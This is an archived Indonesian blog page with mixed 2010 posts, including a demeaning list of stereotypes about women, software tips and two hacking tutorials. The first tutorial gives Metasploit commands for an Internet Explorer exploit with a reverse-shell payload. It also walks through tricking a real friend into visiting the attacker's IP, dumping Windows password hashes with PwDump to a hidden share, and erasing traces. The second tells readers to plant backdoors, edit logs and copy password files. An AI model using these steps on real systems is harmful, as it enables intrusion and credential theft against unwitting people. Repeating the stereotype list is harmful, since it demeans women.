Sabtu, 03 Juli 2010

Perbedaan Wanita dengan Cewek

04.07.2010 | Author: admin | Article Posted in Pernikahan

WANITA: Pengertian dan menerima anda apa adanya. Namun tetap memberi saran yang mendidik bila anda melakukan kesalahan.
CEWEK: Menuntut banyak sekali ini itu tanpa melihat kesalahan pada dirinya sendiri. Akan marah² atau minimal ngambek kalau anda berbuat salah.

WANITA: Selalu berusaha ceria di setiap moment bersama dengan anda.
CEWEK: Suka BETE tiba² tanpa sebab dan kalau ditanya kenapa, akan menjawab seolah tidak ada apa² dan membuat anda bingung.

WANITA: Bisa membuat anda tertawa dan membuat anda makin ingin lebih menyayanginya setiap hari.
CEWEK: Selalu menuntut punya cowok yang bisa membuatnya tertawa, namun pada kenyataannya susah sekali dibuat tertawa karena merasa nanti dikira gampangan.

WANITA: Bersikap jujur dan apa adanya.
CEWEK: Bersikap jual mahal dan hobby nya nge test cowok.

WANITA: Meminta anda pamit dulu dengan orangtuanya dan memperkenalkan anda sebelum pergi bersama anda.
CEWEK: Membuat anda duduk berlama lama di ruang tamu karena lama bgt dandannya.

WANITA: Independent, tetap memprioritaskan karier dan masa depan tanpa mau tergantung orang.
CEWEK: Memprioritaskan punya cowok yang mapan dengan alasan tuntutan jaman dan akan merasa secure masa depannya hanya dengan cowok² seperti itu

WANITA: Tampil natural, simple tapi tetep classy. Dan tampil anggun pada event² tertentu.
CEWEK: Menor, berlebihan dan high maintenance.

WANITA: Belajar bikin kue jenis baru 2 kali seminggu.
CEWEK: Ke salon 2 kali seminggu.

WANITA: Punya prinsip yang jelas dan berusaha untuk mengaplikasikannya di dalam kehidupannya setiap hari.
CEWEK: Tidak punya sikap, tidak tegas dan tidak tahu apa kemauannya sebenarnya. Hanya bisa tergantung pada anda.

WANITA: Menguasai diri, mengambil keputusan tegas dalam menyelesaikan setiap masalah dan konsekuen dengan keputusan tsb.
CEWEK: Marah², nangis berhari hari dan curhat panjang lebar dengan teman kalau disakiti dan berikrar tidak akan mau berhubungan dengan anda lagi. Yea right.. 3 hari kemudian dia pasti akan memaafkan anda kok..

WANITA: Betah di rumah, dan suka menyenangkan hati orangtua nya.
CEWEK: Gak pernah mau ketinggalan datang kalau ada party.

WANITA: Menyukai film karena ide cerita yang disampaikan sungguh luar biasa.
CEWEK: Menyukai film karena aktor cakep dan manis yang main tanpa melihat isi ceritanya.

WANITA: Ingin punya pria yang percaya akan dirinya sendiri, jujur, bisa menjaga dan menyayanginya apa adanya.
CEWEK: Pengen punya cowok seperti Brad Pitt, dewasa,mapan, perut six pack, siap mengantarjemput 24-7 dan wajib menyayanginya di atas segalanya

WANITA: Mampu menjaga diri sendiri dengan tidak pernah berbuat yang aneh aneh.
CEWEK: Berbuat yang aneh-aneh yang membingungkan dan membuat khawatir orang lain, orangtua dan teman sendiri.

WANITA: Mengutarakan perasaannya dengan tenang dan tetap mengerti perasaan anda.
CEWEK: Maunya selalu diutamakan perasaannya tanpa memikirkan perasaan anda sedikit pun.

WANITA: Mau bersosialisasi dengan teman² anda dan memperkenalkan anda dengan teman² dekatnya
CEWEK: Deket sama semua cowok sesuka hati tapi kalau anda sendiri deket sama satu cewek aja dia bisa marah setengah mati.

WANITA: Dekat dengan orangtuanya sendiri dan dikenal baik oleh orangtua anda.
CEWEK: Bahkan dengan orangtuanya sendiri kurang akrab.

WANITA: Mengerti kesibukan anda dan bisa naik kendaraan umum pada saat darurat tanpa mau menyusahkan anda.
CEWEK: Marah² karena anda tidak bisa menjemput dan mengatakan anda sudah tidak peduli lagi terhadapnya.

WANITA: Sayang binatang, seneng ketrampilan dan bersifat keibuan.
CEWEK: Takut pada binatang, tidak punya sense of art dan childish.

WANITA: Siap menjadi istri yang setia dan sholehah dan sudah dipersiapkan dengan matang.
CEWEK: Masih berfikir ini dan itu, padahal semua sudah dipersiapkan dengan matang.

WANITA: Berfikiran jauh kedepan, berpandangan luas, selalu hati-hati dan teliti.
CEWEK: Berfikir pendek, tanpa memikirkan dampaknya.

WANITA: Peduli dengan lingkungan sekitar, mau bekerja dirumah dan menyelesaikan pekerjaan rumah.
CEWEK: Tidak suka bekerja dirumah, biasanya nyuruh pembantu untuk membereskan segala sesuatunya.

WANITA: Bersahaja, sopan dan santun serta ceria.
CEWEK: Manja, kurang menghormati orang dan berbuat sesuka hati.

WANITA: Segera memakai jilbab, karena jilbab adalah WAJIB bagi para wanita karena sangat jelas hal itu perintah Allah SWT dan ada balasan pahala yang besar disana.
CEWEK: Membuka jilbabnya, memperlihatkan aurat & kecantikan serta memiliki berbagai alasan untuk tidak memakai jilbab. Padahal dia tahu, dosa akan menyelimutinya setiap saat jika dia mengumbar auratnya.

WANITA: Belajar lebih keras, tegar, ikhlas, sabar, tabah dan mau mengalah demi kebaikan dan keadilan.
CEWEK: Belajarnya malas-malasan, tidak sabaran, mengeluh kalau mendapat ujian dan tidak mau mengalah karena merasa paling benar sendiri.

Jumat, 02 Juli 2010

Download embedded shockwave flash (swf) files dari web browser

Saat ini, banyak tutorial video yang ditampilkan dalam web browser. Hampir dapat dipastikan bahwa semua animasi yang ditampilkan dalam format Shockwave Flash swf. Kelebihan format ini adalah ukuran yang kecil ( untuk video tutorial) dan dengan mudah dijalankan melalui web browser yang telah disertakan plugins shockwave player.

Terkadang setelah kita melihat video di web browser, ingin kita simpan di hardisk, sehingga bisa kita lihat offline. Tetapi hal ini sering membingungkan, bagaimana caranya menyimpan file swf itu. Karena dengan klik kanan video, tidak ada menu untuk menyimpannya. Ada tips yang bagus untuk menyimpan file embedded ini ke hardisk. Tips ini bisa dijalankan di Mozilla Firefox, Internet Explorer (IE) dan Opera tanpa menambahkan plugins apapun.

1. Menyimpan dari Browser MozillaFirefox
Untuk Pemula :

  1. Klik ToolsPage Info
  2. Pilih tab Media di bagian Page Info Windows
  3. Disana ditampilkan daftar lengkap dengan preview data gambar, CSS files dan Shockwave Flash yang sudah didownload oleh Firefox ketika membuka filenya.
  4. Scroll down dan cari file swf yang diinginkan.
  5. Klik tombol Save As, dan simpan dilokasi yang diinginkan.

Untuk Power Users :

  1. Buka browser
  2. Tuliskan di URL Address about:cache?device=disk .
  3. Akan ditampilkan semua data sementara dari hasil browsing, seperti gambar, file php, Shockwave flash dan lainnya.
  4. Untuk mencari tinggal klik Ctrl+F dan cari nama bagian web atau hanya tulis .swf.
  5. Setelah ditemukan maka klik kanan linknya dan pilih Save link as

2. Menyimpan dari browser Internet Explorer

  1. Klik Tools - Internet Options
  2. Di bagian General Tab, Klik Settings dibagian Temporary Internet Files group.
  3. Klik View Files untuk melihat isi folder Temporary Internet Files folder. Folder ini dapat berisi ratusan , ribuan bahkan lebih, tergantung setting maksimal spacenya.
  4. Untuk mencari file swf, tinggal urutkan berdasarkan file types. Dan cari dengan tipe Shockwave flash object.
  5. Jika sudah ditemukan, simpan file tersebut ke folder lain

Menyimpan di browser Opera
Caranya seperti menyimpan dalam browser Internet Explorer.

Kamis, 01 Juli 2010

Windows 7

Microsoft Indonesia kini meluncurkan Windows 7 sebagai sebuah sistem operasi terbaru. Dilengkapi dengan fitur-fitur yang mampu meningkatkan produktifitas, konektifitas serba hiburan. Menjadikan pengalaman digital Anda semakin seru, dinamis, efektif dan aman.

Terinspirasi dari kebutuhan manusia untuk memiliki kemudahan dalam beraktifitas dengan komputer, Windows 7 hadir dengan fitur-fitur yang tak hanya mudah namun memberikan banyak keuntungan.

1. Mudah menjalani tugas sehari-hari

desktop Desktop feature yang semakin fleksibel, dan cara memodifikasi semakin kreatif. Home Group, memudahkan untuk setting network untuk berbagi file dan printer. Jump List, akses ke folder favorit dengan lebih cepat. Snap, cara mudah untuk resize dan membandingkan windows yang ada. Windows Live Essentials, fitur lengkap untuk email, foto galeri dan favorit lainnya. Window Search, fitur browsing folder dan dokumen seperti browsing internet.




2. Berfungsi sesuai dengan yang Anda inginkan
usb Performance Improvement, kinerja daya dari sleep dan resume windows lebih cepat, baterai tidak cepat habis, dan dapat mendeteksi USB hardware lebih cepat. Full 64-bit Support, dengan Windows 7 dapat memaksimalkan daya PC dengan standard desktop yang terbaru. Power Management, dengan fitur power-saving baru membuat kinerja laptop lebih tahan lama.




3. Memungkinkan untuk membuat sesuatu yang baru
touchgo

Easier Wireless Networking, langkah koneksi yang lebih cepat dengan Windows 7. Windows Media Center dengan alat tambahan, Anda dapat menonton, merekam dan pause acara TV favorit Anda. Windows Touch, dengan fitur touch screen, padukan Windows Touch dengan PC sensitif, Anda tidak perlu selalu menggunakan keyboard dan mouse.

Anda bisa melihat koleksi Windows 7 Video Tour untuk lebih jelasnya.

7 Anti Virus Terbaik yang Akan Melindungi Komputer Kita


Selama ini, dengan berbagai kemajuan teknologi, selalu saja muncul "tangan-tangan jahil" yang ingin membuktikan eksistensinya di dunia. Salah satu tandanya adalah dengan munculnya berbagai macam virus komputer dalam berbagai variasinya. Ada yang sekadar iseng agar dikenal, tapi banyak juga yang bertujuan mencuri data hingga merusaknya. Jika tak waspada, barangkali kita akan menjadi korbannya.. Atau.. bahkan sudah menjadi korban tanpa disadari?

Beruntung, ada banyak juga bermunculan program-program Anti Virus yang membantu kita. Meski harus diakui-ibarat penyakit-kadang, obat baru diciptakan setelah penyakit menginfeksi. Begitu juga antivirus, kadang saat sudah berhasil mengatasi virus jahat, muncul lagi versi virus jahat lainnya. Begitu seterusnya. Namun, setidaknya, dengan adanya antivirus, paling tidak kita sudah memberi perlindungan yang cukup-daripada tidak sama sekali.

Nah, lantas, antivirus seperti apa yang bisa kita andalkan untuk menjadi "penjaga" komputer kita? Windows 7 sebenarnya sudah memiliki tingkat security yang tinggi. Sebab, itulah salah satu keunggulan keluarga baru Microsoft ini. Namun, ditambah dengan beberapa antivirus ini, pastinya kita akan jauh lebih nyaman bekerja tanpa rasa was-was lagi…

1. BitDefender Antivirus 2010
Menurut toptenreviews.com, antivirus ini merupakan salah satu antivirus yang paling bisa diandalkan, terutama dari segi kemudahan penggunaan dan tingkat keamanan terhadap virus-virus baru yang terus berdatangan.

2. Kaspersky Anti-Virus 2010
Ini termasuk antivirus paling laris di pasaran karena memiliki keunggulan terutama dalam mendeteksi virus, trojans, worms, hingga spyware. Beruntung, bagi para pengguna Acer, untuk beberapa tipe notebook dan PC, Kaspersky Anti-Virus sudah disediakan menjadi bonus paket. Karena itu, menggunakan Acer, sudah pasti makin aman dan nyaman tanpa khawatir terkena serangan virus yang merusak data.

3. Webroot AntiVirus with SpySweeper 2010
Dengan basis perlindungan dalam beberapa tingkatan, antivirus ini akan memberikan kenyamanan bagi mereka yang sering berinteraksi dengan menggunakan jaringan internet.

4. Norton AntiVirus 2010
Ini merupakan salah satu pelopor program antivirus di dunia. Karena itu, kehandalannya sudah tidak diragukan lagi. Apalagi, dengan berbagai pengembangan yang dilakukan berdasar masukan langsung dari penggunanya, Norton menjadi salah satu antivirus yang bisa diandalkan.

5. ESET Nod32 Antivirus 4
Bagi pengguna komputer rumahan, antivirus ini termasuk salah satu yang paling mudah dalam penggunaan dan tingkat kenyamanannya.

6. AVG Anti-Virus 9
Antivirus ini merupakan salah satu antivirus yang paling sering diunduh karena memang menyediakan layanan gratis yang cukup handal bagi penggunanya. Namun, bagi yang ingin mendapatkan layanan lengkap, versi yang pro akan memberikan kenyamanan yang lebih tinggi.

7. Smadav 2010
Saat ini, banyak sekali virus lokal yang kadang tak terdeteksi dengan antivirus luar. Karena itu, penggunaan antivirus lokal seperti Smadav ini bisa melengkapi kinerja antivirus luar sehingga komputer kita bisa benar-benar aman.

Rabu, 30 Juni 2010

Isi waktu luang dengan bekerja


Saat paling berbahaya bagi akal adalah manakala pemiliknya menganggur dan tak berbuat apa-apa. Orang seperti itu, ibarat mobil yang berjalan dengan kecepatan tinggi tanpa sopir, akan mudah oleng ke kanan dan ke kiri.

Bila pada suatu hari Anda mendapatkan diri Anda menganggur tanpa kegiatan, bersiaplah untuk bersedih, gundah, dan cemas! Sebab, dalam keadaan kosong itulah pikiran Anda akan menerawang ke mana-mana; mulai dari mengingat kegelapan masa lalu, menyesali kesialan masa kini, hingga mencemaskan kelamnya masa depan yang belum tentu Anda alami. Dan itu, membuat akal pikiran Anda tak terkendali dan mudah lepas kontrol. Maka dari itu, saya nasehatkan kepada Anda dan diriku sendiri bahwa mengerjakan amalan-amalan yang bermanfaat adalah lebih baik daripada terlarut dalam kekosongan yang membinasakan. Singkatnya, membiarkan diri dalam kekosongan itu sama halnya dengan bunuh diri dan merusak tubuh dengan narkoba.

Waktu kosong itu tak ubahnya dengan siksaan halus ala penjara Cina; meletakkan si narapidana di bawah pipa air yang hanya dapat meneteskan air satu tetes setiap menit selama bertahun-tahun. Dan dalam masa
penantian yang panjang itulah, biasanya seorang napi akan menjadi stres dan gila.

Berhenti dari kesibukan itu kelengahan, dan waktu kosong adalah pencuri yang culas. Adapun akal Anda, tak lain merupakan mangsa empuk yang siap dicabik-cabik oleh ganasnya terkaman kedua hal tadi; kelengahan dan si “pencuri”.

Karena itu bangkitlah sekarang juga. Kerjakan shalat, baca buku, bertasbih, mengkaji, menulis, merapikan meja kerja, merapikan kamar, atau berbuatlah sesuatu yang bermanfaat bagi orang lain untuk mengusir kekosongan itu! Ini, karena aku ingin mengingatkan Anda agar tidak berhenti sejenak pun dari melakukan sesuatu yang bermanfaat.

Bunuhlah setiap waktu kosong dengan ‘pisau’ kesibukan! Dengan cara itu, dokter-dokter dunia akan berani menjamin bahwa Anda telah mencapai 50% dari kebahagiaan. Lihatlah para petani, nelayan, dan para kuli bangunan! Mereka dengan ceria mendendangkan lagu-lagu seperti burung-burung di alam bebas. Mereka tidak seperti Anda yang tidur di atas ranjang empuk, tetapi selalu gelisah dan menyeka air mata kesedihan.

-dikutip dari buku La Tahzan kayra DR. ‘Aidh al-Qarni-

Ubuntu Muslim Edition + Mac4Lin

Sudah lama tidak bermain lagi dengan linux. Terakhir mencicipi linux mint 3.1 (yang merupakan turunan dari ubuntu). Semenjak mengenal ubuntu dari versi 5.04, hampir setiap versi ubuntu yang dirilis selalu saya cicipi di PC ataupun Laptop. Baik itu diperoleh lewat program ShipIt, pinjem teman, dari majalah komputer, maupun men-download langsung dari internet. Tapi semenjak jadi ‘pekerja kerah putih’, kegitan ngoprek linux ataupun ngoprek lainnya jadi terhenti. Entah karena terlalu ‘sibuk’ atau emang kehilangan motivasi (males :p ).

Baru-baru ini, Ubuntu mengeluarkan versi terbaru yaitu ubuntu 7.10 Gutsy Gibbon. Bahkan beberapa kota di Indonesia dan penjuru dunia lainnya sampai mengadakan acara Penyambutan Rilis terbaru (GRP, Gutsy Release Party) oleh komunitas ubuntu. Meskipun saya tidak pernah aktif di komunitas ubuntu, tapi saya juga ingin ikut menyambut kedatangan ubuntu rilis terbaru di blog yang sudah lama tak diurus ini.. hehe.

Komentar saya cuma satu untuk ubuntu edisi terbaru ini… WOW. Di laptot yang saya gunakan, Lenovo Y400, di Ubuntu versi sebelumnya biasanya untuk mengeluarkan suara harus menginstall alsa versi terbaru terlebih dahulu.. Tapi dengan Gutsy, ga perlu repot-repot lagi… Untuk mencoba efek 3D dengan compiz pun ga perlu cape-cape download buat nginstall.. Namun untuk menjalankan beberapa file multimedia seperti mp3, avi, mp4, mpeg tetep harus nginstall lagi dari internet… :( Tapi kabarnya Blankon 2.0, mau dirilis tanggal 15 November nanti loh.. Blankon 2.0 dah support mp3 loh (kayak linux mint).

Bagi temen-temen Muslim yang ingin menginstall Ubuntu bernuansa Islami, dapat mencoba Ubuntu Muslim Edition. Ubuntu Muslim Edition adalah modifikasi Ubuntu dengan menambahkan beberapa apliakasi Islami seperti penunjuk waktu sholat (Mimbar Prayer Times), Al-Quran dari Internet (Zekr), Kalender Hijriah, Web Content Filtering serta modifikasi beberapa themes seperti tampilan grub manager, usplash, GDM Login, Themes, dsb.

Biasanya sudah tersedia dalam bentuk ISO, namun sampai tulisan ini dibuat untuk Ubuntu 7.10 masih belum tersedia. Mudah-mudahan dalam waktu dekat sudah selesai di kompilasi dan dapat di download. Atau jika mempunyai akses internet, kamu dapat menjalankan script yang telah dibuat untuk memodifikasi Ubuntu 7.10 dan langsung mendownload file-file yang dibutuhkan dan mengubah Ubuntu kamu menjadi lebih Islami.

Atau jika ingin menganti tampilan ubuntu menjadi lebih mirip Mac OS X, kamu bisa mencoba Mac4Lin, sebuah kumpulan paket berisi file-file yang dibutuhkan untuk mengganti tampilan Ubuntu kamu menjadi jadi lebih mirip Mac OSX yang dikembangkan oleh Anirudh (In ubuntuforum known as infra_red_dude)… Thanks dude.

Selamat berUbuntu ria….

screenshot1.png screenshot2.png screenshot3.png

Screenshots dari Ubuntu Muslim Edition dapat dilihat disini http://ubuntume.com/screenshots.

Belajar Hack Yuck! (2) – Hack Windows XP SP2

Disclaimer: This document was written in the interest of education. The author cannot be held responsible for how the topics discussed in this document are applied.

Setelah mengetahui sedikit dan konsep dasar ‘standar’ mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. Disini saya sengaja menggunakan VMWare untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.

Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit serta PwDump6 untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?

The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.

Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca dokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ‘limited user’ tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya.

Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!!

Pertama2 jalankan ‘mfsconsole’!

main1.JPG

Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.

Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution.

This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.

Untuk melihat info dari exploit ini gunakan perintah :

msf > info ie_vml_rectfill

Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja “wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja :-D ).


Untuk menggunakan exploit gunakan perintah2 berikut dalam console :

msf > use_ie_vml_rectfill

msf > set PAYLOAD win32_reverse

msf > set RHOST ip_target

msf > set LHOST ip_penyerang

msf > exploit

Hasilnya akan tampak seperti gambar berikut :

exploit1.JPG

Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ‘exploit’, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus :-D

Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target.

Crack da Password!

Nah, setelah kita ‘menguasai’ komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password, tapi karena ini remote maka kita harus ‘menyediakan’ program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ‘biasa’, pwdump tidak akan berhasil!

Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ‘$’ biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ‘net use’. Contoh perintah yang digunakan :

pwdump.JPG

Setelah itu copy Pwdump ke komputer target dalam folder sementara, ‘temp’. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah

C:\temp\Pwdump –o pass.txt 127.0.0.1

Klo berhasil akan tampak pada gambar berikut.

dump1.JPG

Lalu copy file pass.txt ke komputer kita

C:\temp\copy pass.txt z:

Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.

clean.JPG

Nah, udah dapet hash file nya kan. Tinggal di crack aja deh…. (baca artikel sebelumnya buat nge-crack password).

Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ‘menyenangkan’ untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.

Happy Hacking…..

Beberapa saran agar windows kita tetap aman terhadap exploit diatas.

1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.

2. Patch Windows anda.

3. Gunakan antivirus dengan update terbaru

4. Hati2 terhadap teman anda sendiri.. waspadalah!! ;p

Reference :

http://www.metasploit.com

Belajar Hack Yuck! (1) – Konsep Dasar Hacking

Dalam suatu kesempatan, saya pernah melihat seorang auditor keamanan jaringan melalukan penetration test (pen-test) terhadap suatu sistem IT. Karena penasaran saya melihat sedikit2 cara penetration test yang dilakukan. Waktu itu saya belum banyak tahu tools apa aja yang digunakan, yang saya tau dia menggunakan tcpdump untuk menganalisis paket apa aja yang lewat, trus untuk men-scan beberapa host menggunakan Nessus. Ada salah satu aplikasi yang digunakan berbasis web yang terdapat kumpulan beberapa exploit. Waktu itu saya belum tahu aplikasi apa itu, yang saya ingat aplikasi itu menggunakan alamat http://127.0.0.1:55555, nah berbekal port 55555 saya mencari di google, dan ternyata itu adalah Metasploit Framework!.

Peristiwa itu menginspirasikan saya untuk mengenang masa-masa lalu ketika masih seneng2nya ngoprek dan belum ‘tercemar’ oleh DotA. Akhirnya sekarang saya ingin belajar ngoprek lagi, tp lebih fokus ke exploitnya saja. Tulisannya ini akan saya buat menjadi tiga bagian. Bagian pertama mengenai bagaimana salah satu cara umum yang dilakukan untuk menge-hack suatu system. Disini saya lebih menitikberatkan untuk hacking OS Windows XP, karena OS ini paling banyak dipakai orang. Bagian kedua lebih banyak ke teori mengenai exploit. Tapi karena mungkin akan sangat sulit dipahami (saya sendiri msh blm bisa membuat exploit sendiri), saya hanya menuliskan hasil terjemahan yang membahas apa itu dan cara kerja exploit. Sedangkan bagian terakhir merupakan praktek bagaimana mengelakukan penetration test menggunakan metasploit di Windows XP.

Bagian 1

*ini merupakan artikel lama mengenai salah satu cara umum yang dilakukan untuk hacking. (artikel ini jg di mirror oleh Negative a.k.a Jim Geovedi di sini). Langkah dibawah ini merupakan cara ‘standar’, hacking sebenarnya tidak harus selalu sesuai dengan ‘standar’ ini.

Hacking buat pemula

- by aCh

Artikel ini ditujukan bagi pemula, dan disusun oleh pemula. Ditulis untuk pengetahuan semata. Untuk temen2 yg udah ahli, sok aja dilewat, tapi dibaca juga gpp….

Apa sebenarnya hacking itu? klo menurut pengertian gue, hacking adalah ngoprek. Yup, hacking adalah ngoprek, mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, ‘ngudek-ngudek’ sampai ke ‘jeroannya’. Sesuatunya apa dong? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi gue kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, coba baca artikel sebelumnya (How to Become A Hacker). Di situ dijelasin bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol? belum tentu kan….

Pada artikel ini, gue pengen membagi pengalaman mengenai Hacking, walaupun sampai saat ini gue belum pernah nge-Hack ke server orang. Salah satu cara untuk mencoba simulasi Hack yaitu H3cky0uRs3lf! Buat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack Betulan… Apalagi klo di kost ada jaringan.

Pro dan Kontra Hacking


Pro

Kontra

Etika Hacking

Semua informasi adalah free

Jika semua informasi adalah free, maka tidak ada ladi privacy

Aspek Security

Intrusion adalah ilustrasi kelemahan sistem

Tidak perlu menjadi pencuri untuk menunjukkan pintu yang tidak terkunci

Idle Machines

Hacking hanya pada idle machines

idle machines milik siapa ?

science education

hanya membobol tapi tidak merusak

“hacker wannabe” berpotensi sangat besar untuk merusak

Okeh, sekarang waktunya melakukan aksi…

1. Fase Persiapan

~ Mengumpulkan informasi sebanyak-banyaknya

– Secara Aktif : – portscanning

– network mapping

– OS Detection

– application fingerprinting

Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat

– Secara Pasif : – mailing-list (jasakom, newbie_hacker, hackelink, dsb)

– via internet registries (informasi domain, IP Addres)

– Website yang menjadi terget

2. Fase Eksekusi
~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.org, milw0rm, milis bugtraq, atau mencari lewat #IRC).
~ Mengekspolitasi Vulnerability Holes
- compile eksploit -> local host ->

$gcc -o exploit exploit.c

$./exploit

# hostname (# tanda mendapatkan akses root)

remote host -> $gcc -o exploit exploit.c

$./exploit -t www.target.com

# (klo beruntung mendapatkan akes root)

~ Brute Force

– Secara berulang melakukan percobaan otentifikasi.

– Menebak username dan password.

– Cracking password file

~ Social Engineering

– Memperdayai user untuk memeberi tahu Username dan password

– Intinya ngibulin user….

3. Fase Setelah Eksekusi

~ Menginstall backdoor, trojans, dan rootkit

~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin

~ Menyalin /etc/passwd atau /etc/shadow/passwd

Nah, intinya seh cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraketekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot. Saran gue, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Kalaupun pun ga terhubung ke jaringan, kita masih bisa menggunakan Virtual Machine menggunakan VMWare seperti yang nanti akan dibahas pada bagian 3!


Referensi :

-Hacking and Defense, Jim Geovedi, negative@magnesium.net

-Network Defense, Jim Geovedi, negative@magnesium.net



http://nor-alfiyah.blogspot.com/2010/06/belajar-hack-yuck-2-hack-windows-xp-sp2.html

Minggu, 27 Juni 2010

Rootkit, Tools Untuk Para Hacker

Didalam dunia hacking dikenal adanya istilah “rootkit� yang begitu populer walaupun banyak yang tidak mengerti dengan apa yang dimaksud dengan rootkit.

